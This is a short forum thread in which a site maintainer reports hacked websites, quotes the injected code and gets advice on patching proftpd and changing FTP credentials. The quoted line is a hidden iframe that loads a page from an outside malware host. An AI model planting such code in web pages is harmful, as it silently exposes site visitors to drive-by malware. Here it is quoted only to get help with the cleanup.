-1

deathtesting.ru

Not sure if this is in the right place but anyway........

A load of sites i help maintain have been having code added to them.

<div style="display:none"><iframe width=438 height=168 src="http://deathtesting.  ru:8080/index.php" ></iframe></div>

normally with a load of random divs as well.

I have found out from a random l Lithuanian site that this is a proftpd service vulnerability.

Google has flagged the sites and is displaying warnings that our site may contain malware.

Any ideas how to get rid of it?

We are currently changing our FTP and control panel codes and i will get rid of the code and reupload again and see if that works but is there anything else that can be done?

The sites are hosted on 1&1 if that makes any difference.

Have tried removing the code and re-uploading.

kained

Junior Poster

126 posts since May 2004

Reputation Points: 10

Solved Threads: 0

2 Years Ago

0

Until you can verify that the proftpd application has been patched you should disable it. The Fedora update for proftpd was published on the 24th. It may already be in place on your hosting service.

BrianDSy

Newbie Poster

9 posts since Jul 2009

Reputation Points: 11

Solved Threads: 2

2 Years Ago

0

Thinks is okay now, just changed the FTP and control panel codes and reuploaded everything and it seems to be fine.

kained

Junior Poster

126 posts since May 2004

Reputation Points: 10